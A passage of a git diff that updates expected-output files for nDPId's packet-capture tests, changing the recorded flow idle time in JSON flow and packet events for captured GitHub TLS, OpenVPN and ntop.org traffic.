@@ -1,13 +1,13 @@ 00458{"daemon_event_id":1,"daemon_event_name":"init","thread_id":0,"packet_id":0,"source":"443-git.pcap","alias":"nDPId-test","max-flows-per-thread":2048,"max-idle-flows-per-thread":64,"tick-resolution":1000,"reader-thread-count":1,"flow-scan-interval":10000,"generic-max-idle-time":600000,"icmp-max-idle-time":120000,"udp-max-idle-time":180000,"tcp-max-idle-time":7560000,"max-packets-per-flow-to-send":3,"max-packets-per-flow-to-process":32,"global_ts_msec":0} 00544{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"443-git.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-data-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1581113657633} -00574{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"443-git.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1581113657633,"flow_last_seen":1581113657633,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1581113657633,"l3_proto":"ip4","src_ip":"192.168.1.13","dst_ip":"140.82.114.4","src_port":55744,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"443-git.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1581113657633,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1581113657633,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGeqzAqAENjFJyBNnAAbv0\/p5\/AAAAALAC\/\/+NzAAAAgQFtAEDAwUBAQgKHmpbwAAAAAAEAgAA"} -00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"443-git.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1581113657744,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1581113657744,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAADIGiLCMUnIEwKgBDQG72cCAzdDM9P6egKASb0C\/0wAAAgQFnAQCCAoOCxAaHmpbwAEDAwo="} -00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"443-git.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1581113657744,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1581113657744,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGerjAqAENjFJyBNnAAbv0\/p6AgM3QzYAQECpNNAAAAQEICh5qXC0OCxAa"} 
-00847{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"443-git.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1581113657633,"flow_last_seen":1581113657751,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1581113657751,"l3_proto":"ip4","src_ip":"192.168.1.13","dst_ip":"140.82.114.4","src_port":55744,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Github","breed":"Acceptable","category":"Collaborative"},"tls": {"version":"TLSv1.2","client_requested_server_name":"github.com","ja3":"2a26b1a62e40d25d4de3babc9d532f30","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"http\/1.1"}} -00903{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":5,"source":"443-git.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1581113657633,"flow_last_seen":1581113657863,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1424,"flow_tot_l4_payload_len":1941,"flow_avg_l4_payload_len":388,"midstream":0,"thread_ts_msec":1581113657863,"l3_proto":"ip4","src_ip":"192.168.1.13","dst_ip":"140.82.114.4","src_port":55744,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Github","breed":"Acceptable","category":"Collaborative"},"tls": {"version":"TLSv1.2","client_requested_server_name":"github.com","ja3":"2a26b1a62e40d25d4de3babc9d532f30","ja3s":"ae53107a2e47ea20c72ac44821a728bf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"http\/1.1"}} 
-01207{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":7,"source":"443-git.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1581113657633,"flow_last_seen":1581113657863,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1424,"flow_tot_l4_payload_len":4067,"flow_avg_l4_payload_len":581,"midstream":0,"thread_ts_msec":1581113657863,"l3_proto":"ip4","src_ip":"192.168.1.13","dst_ip":"140.82.114.4","src_port":55744,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Github","breed":"Acceptable","category":"Collaborative"},"tls": {"version":"TLSv1.2","client_requested_server_name":"github.com","server_names":"github.com,www.github.com","ja3":"2a26b1a62e40d25d4de3babc9d532f30","ja3s":"ae53107a2e47ea20c72ac44821a728bf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=DigiCert Inc, OU=www.digicert.com, CN=DigiCert SHA2 Extended Validation Server CA","subjectDN":"C=US, ST=California, L=San Francisco, O=GitHub, Inc., CN=github.com","alpn":"http\/1.1","fingerprint":"CA:06:F5:6B:25:8B:7A:0D:4F:2B:05:47:09:39:47:86:51:15:19:84"}} -00694{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":70,"source":"443-git.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":70,"flow_first_seen":1581113657633,"flow_last_seen":1581113658456,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1424,"flow_tot_l4_payload_len":32585,"flow_avg_l4_payload_len":465,"midstream":0,"thread_ts_msec":1581113658456,"l3_proto":"ip4","src_ip":"192.168.1.13","dst_ip":"140.82.114.4","src_port":55744,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Github","breed":"Acceptable","category":"Collaborative"}} 
+00574{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"443-git.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1581113657633,"flow_last_seen":1581113657633,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1581113657633,"l3_proto":"ip4","src_ip":"192.168.1.13","dst_ip":"140.82.114.4","src_port":55744,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"443-git.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1581113657633,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1581113657633,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGeqzAqAENjFJyBNnAAbv0\/p5\/AAAAALAC\/\/+NzAAAAgQFtAEDAwUBAQgKHmpbwAAAAAAEAgAA"} +00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"443-git.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1581113657744,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1581113657744,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAADIGiLCMUnIEwKgBDQG72cCAzdDM9P6egKASb0C\/0wAAAgQFnAQCCAoOCxAaHmpbwAEDAwo="} 
+00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"443-git.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1581113657744,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1581113657744,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGerjAqAENjFJyBNnAAbv0\/p6AgM3QzYAQECpNNAAAAQEICh5qXC0OCxAa"} +00847{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"443-git.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1581113657633,"flow_last_seen":1581113657751,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1581113657751,"l3_proto":"ip4","src_ip":"192.168.1.13","dst_ip":"140.82.114.4","src_port":55744,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Github","breed":"Acceptable","category":"Collaborative"},"tls": {"version":"TLSv1.2","client_requested_server_name":"github.com","ja3":"2a26b1a62e40d25d4de3babc9d532f30","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"http\/1.1"}} +00903{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":5,"source":"443-git.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1581113657633,"flow_last_seen":1581113657863,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1424,"flow_tot_l4_payload_len":1941,"flow_avg_l4_payload_len":388,"midstream":0,"thread_ts_msec":1581113657863,"l3_proto":"ip4","src_ip":"192.168.1.13","dst_ip":"140.82.114.4","src_port":55744,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Github","breed":"Acceptable","category":"Collaborative"},"tls": 
{"version":"TLSv1.2","client_requested_server_name":"github.com","ja3":"2a26b1a62e40d25d4de3babc9d532f30","ja3s":"ae53107a2e47ea20c72ac44821a728bf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"http\/1.1"}} +01207{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":7,"source":"443-git.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1581113657633,"flow_last_seen":1581113657863,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1424,"flow_tot_l4_payload_len":4067,"flow_avg_l4_payload_len":581,"midstream":0,"thread_ts_msec":1581113657863,"l3_proto":"ip4","src_ip":"192.168.1.13","dst_ip":"140.82.114.4","src_port":55744,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Github","breed":"Acceptable","category":"Collaborative"},"tls": {"version":"TLSv1.2","client_requested_server_name":"github.com","server_names":"github.com,www.github.com","ja3":"2a26b1a62e40d25d4de3babc9d532f30","ja3s":"ae53107a2e47ea20c72ac44821a728bf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=DigiCert Inc, OU=www.digicert.com, CN=DigiCert SHA2 Extended Validation Server CA","subjectDN":"C=US, ST=California, L=San Francisco, O=GitHub, Inc., CN=github.com","alpn":"http\/1.1","fingerprint":"CA:06:F5:6B:25:8B:7A:0D:4F:2B:05:47:09:39:47:86:51:15:19:84"}} 
+00694{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":70,"source":"443-git.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":70,"flow_first_seen":1581113657633,"flow_last_seen":1581113658456,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1424,"flow_tot_l4_payload_len":32585,"flow_avg_l4_payload_len":465,"midstream":0,"thread_ts_msec":1581113658456,"l3_proto":"ip4","src_ip":"192.168.1.13","dst_ip":"140.82.114.4","src_port":55744,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Github","breed":"Acceptable","category":"Collaborative"}} 00554{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":70,"source":"443-git.pcap","alias":"nDPId-test","packets-captured":70,"packets-processed":70,"total-skipped-flows":0,"total-l4-data-len":32585,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":1,"total-detection-updates":2,"total-updates":0,"current-active-flows":0,"total-active-flows":1,"total-idle-flows":1,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":11,"global_ts_msec":1581113658456} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 70/70 diff --git a/test/results/443-opvn.pcap.out b/test/results/443-opvn.pcap.out index 68ab92376..6412c77af 100644 --- a/test/results/443-opvn.pcap.out +++ b/test/results/443-opvn.pcap.out 
@@ -1,11 +1,11 @@ 00459{"daemon_event_id":1,"daemon_event_name":"init","thread_id":0,"packet_id":0,"source":"443-opvn.pcap","alias":"nDPId-test","max-flows-per-thread":2048,"max-idle-flows-per-thread":64,"tick-resolution":1000,"reader-thread-count":1,"flow-scan-interval":10000,"generic-max-idle-time":600000,"icmp-max-idle-time":120000,"udp-max-idle-time":180000,"tcp-max-idle-time":7560000,"max-packets-per-flow-to-send":3,"max-packets-per-flow-to-process":32,"global_ts_msec":0} 00545{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"443-opvn.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-data-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1581153175528} -00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"443-opvn.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1581153175528,"flow_last_seen":1581153175528,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1581153175528,"l3_proto":"ip4","src_ip":"192.168.1.84","dst_ip":"192.12.192.103","src_port":52973,"dst_port":1194,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"443-opvn.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1581153175528,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1581153175528,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAG+EfAqAFUwAzAZ87tBKpga1quAAAAALAC\/\/\/PlAAAAgQFtAEDAwUBAQgKFg2AOQAAAAAEAgAA"} -00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"443-opvn.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1581153175550,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1581153175550,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAADYGAkzADMBnwKgBVASqzu1gWZU1YGtar6AScSBwigAAAgQFrAQCCAocQO0VFg2AOQEDAwY="} -00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"443-opvn.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1581153175550,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1581153175550,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAG+FPAqAFUwAzAZ87tBKpga1qvYFmVNoAQECwALgAAAQEIChYNgE0cQO0V"} 
-00640{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":6,"source":"443-opvn.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1581153175528,"flow_last_seen":1581153176626,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":56,"flow_tot_l4_payload_len":100,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1581153176626,"l3_proto":"ip4","src_ip":"192.168.1.84","dst_ip":"192.12.192.103","src_port":52973,"dst_port":1194,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"OpenVPN","breed":"Acceptable","category":"VPN"}} -00684{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":46,"source":"443-opvn.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":46,"flow_first_seen":1581153175528,"flow_last_seen":1581153184491,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":8517,"flow_avg_l4_payload_len":185,"midstream":0,"thread_ts_msec":1581153184491,"l3_proto":"ip4","src_ip":"192.168.1.84","dst_ip":"192.12.192.103","src_port":52973,"dst_port":1194,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"OpenVPN","breed":"Acceptable","category":"VPN"}} +00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"443-opvn.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1581153175528,"flow_last_seen":1581153175528,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1581153175528,"l3_proto":"ip4","src_ip":"192.168.1.84","dst_ip":"192.12.192.103","src_port":52973,"dst_port":1194,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"443-opvn.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1581153175528,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1581153175528,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAG+EfAqAFUwAzAZ87tBKpga1quAAAAALAC\/\/\/PlAAAAgQFtAEDAwUBAQgKFg2AOQAAAAAEAgAA"} +00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"443-opvn.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1581153175550,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1581153175550,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAADYGAkzADMBnwKgBVASqzu1gWZU1YGtar6AScSBwigAAAgQFrAQCCAocQO0VFg2AOQEDAwY="} +00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"443-opvn.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1581153175550,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1581153175550,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAG+FPAqAFUwAzAZ87tBKpga1qvYFmVNoAQECwALgAAAQEIChYNgE0cQO0V"} 
+00640{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":6,"source":"443-opvn.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1581153175528,"flow_last_seen":1581153176626,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":56,"flow_tot_l4_payload_len":100,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1581153176626,"l3_proto":"ip4","src_ip":"192.168.1.84","dst_ip":"192.12.192.103","src_port":52973,"dst_port":1194,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"OpenVPN","breed":"Acceptable","category":"VPN"}} +00684{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":46,"source":"443-opvn.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":46,"flow_first_seen":1581153175528,"flow_last_seen":1581153184491,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":8517,"flow_avg_l4_payload_len":185,"midstream":0,"thread_ts_msec":1581153184491,"l3_proto":"ip4","src_ip":"192.168.1.84","dst_ip":"192.12.192.103","src_port":52973,"dst_port":1194,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"OpenVPN","breed":"Acceptable","category":"VPN"}} 00553{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":46,"source":"443-opvn.pcap","alias":"nDPId-test","packets-captured":46,"packets-processed":46,"total-skipped-flows":0,"total-l4-data-len":8517,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":1,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":1,"total-idle-flows":1,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":9,"global_ts_msec":1581153184491} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 46/46 
diff --git a/test/results/443-safari.pcap.out b/test/results/443-safari.pcap.out index f39e1b84c..0a2f9055c 100644 --- a/test/results/443-safari.pcap.out +++ b/test/results/443-safari.pcap.out 
@@ -1,13 +1,13 @@ 00461{"daemon_event_id":1,"daemon_event_name":"init","thread_id":0,"packet_id":0,"source":"443-safari.pcap","alias":"nDPId-test","max-flows-per-thread":2048,"max-idle-flows-per-thread":64,"tick-resolution":1000,"reader-thread-count":1,"flow-scan-interval":10000,"generic-max-idle-time":600000,"icmp-max-idle-time":120000,"udp-max-idle-time":180000,"tcp-max-idle-time":7560000,"max-packets-per-flow-to-send":3,"max-packets-per-flow-to-process":32,"global_ts_msec":0} 00547{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"443-safari.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-data-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1581109359601} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"443-safari.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1581109359601,"flow_last_seen":1581109359601,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1581109359601,"l3_proto":"ip4","src_ip":"192.168.1.13","dst_ip":"178.62.197.130","src_port":53031,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"443-safari.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1581109359601,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1581109359601,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGAULAqAENsj7Fgs8nAbvmgoUNAAAAALAC\/\/+6MQAAAgQFtAEDAwUBAQgKHinouAAAAAAEAgAA"} -00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"443-safari.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1581109359639,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1581109359639,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAADQGDUayPsWCwKgBDQG7zyeqmyMX5oKFDqAS\/ogx6QAAAgQFrAQCCAolLqfYHinouAEDAwc="} -00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"443-safari.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1581109359639,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1581109359639,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGAU7AqAENsj7Fgs8nAbvmgoUOqpsjGIAQECxO5AAAAQEICh4p6N4lLqfY"} 
-00878{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"443-safari.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1581109359601,"flow_last_seen":1581109359641,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":233,"flow_tot_l4_payload_len":233,"flow_avg_l4_payload_len":58,"midstream":0,"thread_ts_msec":1581109359641,"l3_proto":"ip4","src_ip":"192.168.1.13","dst_ip":"178.62.197.130","src_port":53031,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.ntop","breed":"Safe","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.ntop.org","ja3":"a69708a64f853c3bcc214c2c5faf84f3","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,h2-16,h2-15,h2-14,spdy\/3.1,spdy\/3,http\/1.1"}} -00941{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":6,"source":"443-safari.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1581109359601,"flow_last_seen":1581109359683,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1673,"flow_avg_l4_payload_len":278,"midstream":0,"thread_ts_msec":1581109359683,"l3_proto":"ip4","src_ip":"192.168.1.13","dst_ip":"178.62.197.130","src_port":53031,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.ntop","breed":"Safe","category":"Network"},"tls": 